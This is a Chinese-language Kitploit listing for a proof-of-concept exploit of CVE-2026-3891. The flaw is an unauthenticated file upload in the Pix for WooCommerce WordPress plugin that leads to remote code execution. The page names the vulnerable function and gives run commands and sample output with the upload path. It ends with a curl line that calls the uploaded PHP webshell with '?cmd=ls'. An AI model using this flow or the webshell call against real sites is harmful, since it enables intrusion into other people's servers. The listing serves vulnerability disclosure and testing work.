Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-3891-Pix-for-WooCommerce-Plugin-Exploit — CVE-2026-3891 的概念验证 — Pix for WooCommerce <= 1.5.0 中存在未经身份验证的任意文件上传,导致远程代码执行 | Kitploit
工具/GitHubGitHub/m4sh-wacker/cve-2026-3891-pix-for-woocommerce-plugin-exploit
漏洞分析代码分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubm4sh-wacker/cve-2026-3891-pix-for-woocommerce-plugin-exploit

CVE-2026-3891-Pix-for-WooCommerce-Plugin-Exploit

CVE-2026-3891 的概念验证 — Pix for WooCommerce <= 1.5.0 中存在未经身份验证的任意文件上传,导致远程代码执行

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
20211个月前Kitploit 审核通过
分享

CVE-2026-3891-Pix-for-WooCommerce-插件-利用

🛡️ 描述

CVE-2026-3891 是一个严重的未经认证的任意文件上传漏洞,存在于 Pix for WooCommerce WordPress 插件中,影响版本至 1.5.0(含)。

该漏洞存在于 lkn_pix_for_woocommerce_c6_save_settings 功能中,原因是缺少授权控制且文件类型验证不足。此利用工具自动获取有效 nonce,并演示了将 PHP 文件无限制上传到 Web 可访问目录的过程。

通过利用此漏洞,未经认证的攻击者可能能够:

  • 上传任意文件,无需 WordPress 认证。
  • 上传危险扩展名的文件,由于文件类型验证不足。
  • 直接通过 Web 可访问的插件目录访问已上传的文件。
  • 实现远程代码执行(RCE),当上传的 PHP 文件被受影响 Web 服务器执行时。

🚀 特性

  • 未经认证的利用流程:无需有效的 WordPress 用户凭证。
  • 自动获取 Nonce:自动获取并提取所需的 nonce。
  • 自动化文件上传:向易受攻击的 AJAX 处理程序发送必要的多部分上传请求。
  • 直接生成 URL:显示上传的概念验证文件的最终 URL。
  • 简洁的 CLI 输出:提供简单且带颜色的命令行界面。

🛠️ 安装与要求

  1. 要求:安装 Python 3。
  2. 安装 Requests:
root@kitploit:~
pip install requests
  1. 克隆/下载:将 CVE-2026-3891.py 文件保存到您的系统。

💻 用法

root@kitploit:~
python CVE-2026-3891.py

在提示时输入目标 WordPress URL:

root@kitploit:~
[?] Enter target URL: http://localhost/wordpress

示例:

root@kitploit:~
[*] Requesting nonce...
[+] Nonce obtained: **********
[*] Uploading woocommerce.php...

[+] File uploaded successfully!
[+] URL: http://target/wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/woocommerce.php
root@kitploit:~

curl http://target/wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/woocommerce.php?cmd=ls

image

下载工具